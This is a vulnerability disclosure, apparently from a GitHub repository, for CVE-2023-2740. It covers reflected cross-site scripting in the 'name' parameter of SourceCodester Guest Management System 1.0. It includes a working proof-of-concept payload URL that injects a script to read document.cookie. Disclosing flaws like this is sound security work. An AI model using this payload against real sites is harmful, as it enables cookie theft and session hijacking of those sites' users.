Headline
CVE-2023-2740: CVE/XSS.md at main · xryj920/CVE
A vulnerability, which was classified as problematic, has been found in SourceCodester Guest Management System 1.0. Affected by this issue is some unknown functionality of the file dateTest.php of the component GET Parameter Handler. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229160.
Permalink
Cannot retrieve contributors at this time
Guest Management System v1.0 has reflected cross-site scripting
BUG_Author: DRXYJ
Website source code address: https://www.sourcecodester.com/php/14664/guest-management-system-php-full-source-code.html
Vulnerability File: /guestmanagement/dateTest.php
GET parameter “name” exists reflected cross-site scripting vulnerability
Payload: /guestmanagement/dateTest.php?name="><script>alert(document.cookie)</script>&name1=Submit
The js code is successfully executed and the cookie value is returned, which proves that there is a reflected cross-site scripting vulnerability.